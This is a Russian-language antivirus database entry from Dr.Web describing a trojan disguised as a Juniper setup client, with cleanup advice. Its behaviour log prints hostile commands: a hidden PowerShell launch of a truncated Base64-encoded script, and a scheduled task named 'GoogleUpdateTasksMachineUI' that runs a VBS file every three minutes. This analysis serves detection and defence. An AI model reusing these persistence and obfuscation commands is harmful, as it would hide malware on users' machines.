Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen18.56088

Добавлен в вирусную базу Dr.Web: 2022-10-08

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{F27237D7-93C8-44C2-AC6E-D6057B9A918F}\DownloadInformation] 'CODEBASE' = 'https://juniper.net/dana-cached/sc/Junipe...
  • [<HKLM>\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{AA570693-00E2-4907-B6F1-60A1199B030C}\DownloadInformation] 'CODEBASE' = 'https://juniper.net/dana-cached/sc/JuniperSetupClient...
Создает или изменяет следующие файлы
  • <SYSTEM32>\tasks\googleupdatetasksmachineui
Изменения в файловой системе
Создает следующие файлы
  • %ALLUSERSPROFILE%\mia975e.tmp\junipersetupclientinstaller.msi
  • %APPDATA%\juniper networks\setup client\dsmmf.exe
  • %APPDATA%\juniper networks\setup client\dsmmfres_ja.dll
  • %APPDATA%\juniper networks\setup client\dsmmfres_de.dll
  • %APPDATA%\juniper networks\setup client\dsmmfres_fr.dll
  • %APPDATA%\juniper networks\setup client\dsmmfres_zh.dll
  • %APPDATA%\juniper networks\setup client\dsmmfres_zh_cn.dll
  • %APPDATA%\juniper networks\setup client\dsmmfres_es.dll
  • %APPDATA%\juniper networks\setup client\dsmmfres_ko.dll
  • %APPDATA%\juniper networks\setup client\junipersetupclientocx.exe
  • %TEMP%\nsmc65b.tmp\system.dll
  • %APPDATA%\juniper networks\setup client\junipersetupclientdll64.dll
  • %APPDATA%\juniper networks\setup client\junipersetupclientocx64.exe
  • %APPDATA%\juniper networks\setup client\junipersetupclient.exe
  • %APPDATA%\juniper networks\setup client\junipersetupxp.exe
  • %APPDATA%\juniper networks\setup client\junipercompmgrinstaller.exe
  • %APPDATA%\juniper networks\setup client\uninstall.exe
  • %LOCALAPPDATA%\juniper networks\logging\debuglog.log
  • C:\users\public\libraries\recordedtv\backup.vbs
  • C:\users\public\libraries\recordedtv\dne.ps1
  • C:\users\public\libraries\recordedtv\dns.ps1
  • %WINDIR%\downloaded program files\install.log
  • %WINDIR%\downloaded program files\junipersetupclient.inf
  • %WINDIR%\downloaded program files\junipersetupclient.ocx
  • %WINDIR%\downloaded program files\juniperext.exe
  • %WINDIR%\downloaded program files\junipersetupclientctrluninstaller.exe
  • %WINDIR%\downloaded program files\junipersetupclient64.inf
  • %TEMP%\nsm4125.tmp\system.dll
  • %WINDIR%\downloaded program files\junipersetupclient64.ocx
  • %WINDIR%\downloaded program files\juniperext64.exe
  • %APPDATA%\juniper networks\setup client\setupresource_ko.dll
  • %WINDIR%\downloaded program files\junipersetupclientctrluninstaller64.exe
  • %APPDATA%\juniper networks\setup client\setupresource_es.dll
  • %APPDATA%\juniper networks\setup client\setupresource_zh.dll
  • %ALLUSERSPROFILE%\mia975e.tmp\offline\9a189dfe\c7b7c186\main.vbs
  • %ALLUSERSPROFILE%\mia975e.tmp\offline\6908b9f2\6a98a6df\junipersetupclientinstaller.exe
  • %ALLUSERSPROFILE%\mia975e.tmp\junipersetupclientinstaller.exe
  • %ALLUSERSPROFILE%\mia975e.tmp\offline\mmsi.dll\mmsiexec.dll
  • %ALLUSERSPROFILE%\mia975e.tmp\mia.lib
  • %ALLUSERSPROFILE%\mia975e.tmp\junipersetupclientinstaller.res
  • %LOCALAPPDATA%\iiiqf\7z.dll
  • %TEMP%\lang.loc
  • %TEMP%\mia1\installaware.png
  • %TEMP%\mia.tmp
  • %TEMP%\mia1\icon.ico
  • %TEMP%\mia1\mmsiexec.dll
  • %TEMP%\mia1\junipersetupclientinstaller.msi
  • %TEMP%\{27a58781-9b5a-4bbb-9eec-1902ab089d5e}
  • %LOCALAPPDATA%\junipersetupclientinstaller.exe
  • %LOCALAPPDATA%\main.vbs
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\junipersetupclientinstaller.exe
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\junipersetupclientinstaller.msi
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\junipersetupclientinstaller.res
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\mia.lib
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\junipersetupclientinstaller.dat
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\junipersetupclientinstaller.par
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\junipersetupclientinstaller.lnk
  • %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\instance.dat
  • %APPDATA%\juniper networks\setup client\junipersetupdll.dll
  • %APPDATA%\juniper networks\setup client\setupresource_en.dll
  • %APPDATA%\juniper networks\setup client\setupresource_ja.dll
  • %APPDATA%\juniper networks\setup client\setupresource_de.dll
  • %APPDATA%\juniper networks\setup client\setupresource_fr.dll
  • %APPDATA%\juniper networks\setup client\setupresource_zh_cn.dll
  • %APPDATA%\juniper networks\setup client\junipersetupclient.ini
Удаляет следующие файлы
  • %TEMP%\lang.loc
  • %TEMP%\mia.tmp
  • %TEMP%\{27a58781-9b5a-4bbb-9eec-1902ab089d5e}
  • %LOCALAPPDATA%\main.vbs
  • %TEMP%\nsm4125.tmp\system.dll
Перемещает следующие файлы
  • %ALLUSERSPROFILE%\mia975e.tmp\offline\6908b9f2\6a98a6df\junipersetupclientinstaller.exe в %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\offline\6908b9f2\6a98a6df\junipersetupclientinstaller.exe
  • %ALLUSERSPROFILE%\mia975e.tmp\offline\9a189dfe\c7b7c186\main.vbs в %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\offline\9a189dfe\c7b7c186\main.vbs
  • %ALLUSERSPROFILE%\mia975e.tmp\offline\mmsi.dll\mmsiexec.dll в %ALLUSERSPROFILE%\{2ed05c38-d464-4188-bc7f-f6915de8d764}\offline\mmsi.dll\mmsiexec.dll
Сетевая активность
Подключается к
  • 'microsoft.com':80
TCP
Запросы HTTP GET
  • http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
UDP
  • DNS ASK microsoft.com
Другое
Создает и запускает на исполнение
  • '%ALLUSERSPROFILE%\mia975e.tmp\junipersetupclientinstaller.exe' /m="<Полный путь к файлу>" /k=""
  • '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\main.vbs"
  • '%LOCALAPPDATA%\junipersetupclientinstaller.exe'
  • '%APPDATA%\juniper networks\setup client\junipersetupclient.exe' -install
  • '%APPDATA%\juniper networks\setup client\junipersetupclientocx.exe'
  • '%APPDATA%\juniper networks\setup client\junipersetupclientocx64.exe'
  • '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\main.vbs"' (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "&{Start-Sleep -s 1}"' (со скрытым окном)
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "&{Start-Sleep -s 2;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXFJlY29yZGVkVFZcIg0KRG5FQ21kPSJwb3dlcnNoZWxsIC1FeGVjdXRpb25Qb2x...' (со скрытым окном)
  • '%WINDIR%\syswow64\schtasks.exe' /create /F /sc minute /mo 3 /tn "GoogleUpdateTasksMachineUI" /tr C:\Users\Public\Libraries\RecordedTV\backup.vbs' (со скрытым окном)
Запускает на исполнение
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "&{Start-Sleep -s 1}"
  • '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "&{Start-Sleep -s 2;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXFJlY29yZGVkVFZcIg0KRG5FQ21kPSJwb3dlcnNoZWxsIC1FeGVjdXRpb25Qb2x...
  • '%WINDIR%\syswow64\schtasks.exe' /create /F /sc minute /mo 3 /tn "GoogleUpdateTasksMachineUI" /tr C:\Users\Public\Libraries\RecordedTV\backup.vbs
  • '<SYSTEM32>\regsvr32.exe' /s "%WINDIR%\Downloaded Program Files\JuniperSetupClient64.ocx"

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке